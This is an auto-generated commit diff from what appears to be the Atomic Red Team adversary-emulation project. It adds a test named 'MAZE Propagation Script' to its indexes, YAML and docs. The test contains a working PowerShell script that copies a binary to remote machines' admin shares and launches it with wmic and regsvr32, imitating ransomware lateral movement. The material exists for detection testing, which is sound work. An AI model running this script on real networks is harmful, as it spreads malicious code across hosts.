Generated docs from job=generate-docs branch=master [ci skip]

2022-05-10 14:38:48 +00:00
parent a0ca031612
commit 985fc5a85a
6 changed files with 146 additions and 0 deletions
@@ -1151,6 +1151,7 @@ command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD
 command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -731,6 +731,7 @@ command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD
 command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 command-and-control,T1090.003,Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
 command-and-control,T1090.003,Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
@@ -1866,6 +1866,7 @@
  - Atomic Test #18: Curl Download File [windows]
  - Atomic Test #19: Curl Upload File [windows]
  - Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
+  - Atomic Test #21: MAZE Propagation Script [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [macos, linux]
  - Atomic Test #2: Connection Proxy for macOS UI [macos]
@@ -1175,6 +1175,7 @@
  - Atomic Test #18: Curl Download File [windows]
  - Atomic Test #19: Curl Upload File [windows]
  - Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
+  - Atomic Test #21: MAZE Propagation Script [windows]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #3: portproxy reg key [windows]
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -75907,6 +75907,69 @@ command-and-control:
          del /f/s/q %temp%\T1105 >nul 2>&1
          rmdir /s/q %temp%\T1105 >nul 2>&1
        name: command_prompt
+    - name: MAZE Propagation Script
+      auto_generated_guid: 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
+      description: "This test simulates MAZE ransomware's propogation script that
+        searches through a list of computers, tests connectivity to them, and copies
+        a binary file to the Windows\\Temp directory of each one. \nUpon successful
+        execution, a specified binary file will attempt to be copied to each online
+        machine, a list of the online machines, as well as a list of offline machines
+        will be output to a specified location.\nReference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
+        \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        binary_file:
+          description: Binary file to copy to remote machines
+          type: string
+          default: "$env:comspec"
+        exe_remote_folder:
+          description: Path to store executable on remote machine (no drive letter)
+          type: String
+          default: "\\Windows\\Temp\\T1105.exe"
+        remote_drive_letter:
+          description: Remote drive letter
+          type: String
+          default: C
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Binary file must exist at specified location (#{binary_file})
+
+          '
+        prereq_command: 'if (Test-Path #{binary_file}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: 'write-host "The binary_file input parameter must be set
+          to a binary that exists on this computer."
+
+          '
+      - description: 'Machine list must exist at specified location ("$env:temp\T1105MachineList.txt")
+
+          '
+        prereq_command: 'if (Test-Path "$env:temp\T1105MachineList.txt") {exit 0}
+          else {exit 1}
+
+          '
+        get_prereq_command: |
+          new-item -path "$env:temp\T1105MachineList.txt"
+          echo "A machine list file has been generated at "$env:temp\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
+      executor:
+        command: "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list
+          = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach
+          ($machine in get-content -path \"$machine_list\")\n{if (test-connection
+          -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\"
+          \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"\necho $machine
+          >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe
+          /i #{remote_drive_letter}:#{exe_remote_folder}\"}\nelse\n{echo $machine
+          >> \"$offline_list\"}}\n"
+        cleanup_command: "if (test-path \"$env:temp\\T1105CompletedHosts.txt\") \n{foreach
+          ($machine in get-content -path \"$env:temp\\T1105CompletedHosts.txt\")\n{wmic
+          /node: \"$machine\" process where name='\"regsvr32.exe\"' call terminate
+          | out-null\nRemove-Item -path \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"
+          -force -erroraction silentlycontinue}}\nRemove-Item -path \"$env:temp\\T1105OfflineHosts.txt\"
+          -erroraction silentlycontinue\nRemove-item -path \"$env:temp\\T1105CompletedHosts.txt\"
+          -erroraction silentlycontinue\n"
+        name: powershell
  T1090.001:
    technique:
      type: attack-pattern
@@ -44,6 +44,8 @@

 - [Atomic Test #20 - Download a file with Microsoft Connection Manager Auto-Download](#atomic-test-20---download-a-file-with-microsoft-connection-manager-auto-download)

+- [Atomic Test #21 - MAZE Propagation Script](#atomic-test-21---maze-propagation-script)
+

 <br/>

@@ -884,4 +886,81 @@ rmdir /s/q %temp%\T1105 >nul 2>&1



+<br/>
+<br/>
+
+## Atomic Test #21 - MAZE Propagation Script
+This test simulates MAZE ransomware's propogation script that searches through a list of computers, tests connectivity to them, and copies a binary file to the Windows\Temp directory of each one. 
+Upon successful execution, a specified binary file will attempt to be copied to each online machine, a list of the online machines, as well as a list of offline machines will be output to a specified location.
+Reference: https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| binary_file | Binary file to copy to remote machines | string | $env:comspec|
+| exe_remote_folder | Path to store executable on remote machine (no drive letter) | String | &#92;Windows&#92;Temp&#92;T1105.exe|
+| remote_drive_letter | Remote drive letter | String | C|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$machine_list = "$env:temp\T1105MachineList.txt"
+$offline_list = "$env:temp\T1105OfflineHosts.txt"
+$completed_list = "$env:temp\T1105CompletedHosts.txt"
+foreach ($machine in get-content -path "$machine_list")
+{if (test-connection -Count 1 -computername $machine -quiet) 
+{cmd /c copy "#{binary_file}" "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}"
+echo $machine >> "$completed_list"
+wmic /node: "$machine" process call create "regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}"}
+else
+{echo $machine >> "$offline_list"}}
+```
+
+#### Cleanup Commands:
+```powershell
+if (test-path "$env:temp\T1105CompletedHosts.txt") 
+{foreach ($machine in get-content -path "$env:temp\T1105CompletedHosts.txt")
+{wmic /node: "$machine" process where name='"regsvr32.exe"' call terminate | out-null
+Remove-Item -path "\\$machine\#{remote_drive_letter}$#{exe_remote_folder}" -force -erroraction silentlycontinue}}
+Remove-Item -path "$env:temp\T1105OfflineHosts.txt" -erroraction silentlycontinue
+Remove-item -path "$env:temp\T1105CompletedHosts.txt" -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Binary file must exist at specified location (#{binary_file})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{binary_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+write-host "The binary_file input parameter must be set to a binary that exists on this computer."
+```
+##### Description: Machine list must exist at specified location ("$env:temp\T1105MachineList.txt")
+##### Check Prereq Commands:
+```powershell
+if (Test-Path "$env:temp\T1105MachineList.txt") {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+new-item -path "$env:temp\T1105MachineList.txt"
+echo "A machine list file has been generated at "$env:temp\T1105MachineList.txt". Please enter the machines to target there, one machine per line."
+```
+
+
+
+
 <br/>